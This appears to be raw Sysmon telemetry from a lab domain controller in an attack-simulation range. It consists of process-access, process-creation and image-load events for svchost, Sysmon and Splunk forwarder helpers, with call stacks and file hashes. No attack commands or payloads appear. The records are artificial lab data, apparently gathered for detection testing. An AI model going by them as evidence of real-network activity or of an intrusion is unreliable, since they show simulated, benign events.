10341000x80000000000000003117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:27.749{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E9F-6005-9000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.749{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E9F-6005-9000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.751{59A5CD1D-8E9F-6005-9000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.217{59A5CD1D-8E9F-6005-8F00-00000000A301}47324700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E9F-6005-8F00-00000000A301}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E9F-6005-8F00-00000000A301}4732C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E9F-6005-8F00-00000000A301}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.093{59A5CD1D-8E9F-6005-8F00-00000000A301}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x80000000000000003123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.999{59A5CD1D-8E56-6005-2C00-00000000A301}2588C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000003136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EA1-6005-9100-00000000A301}4988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
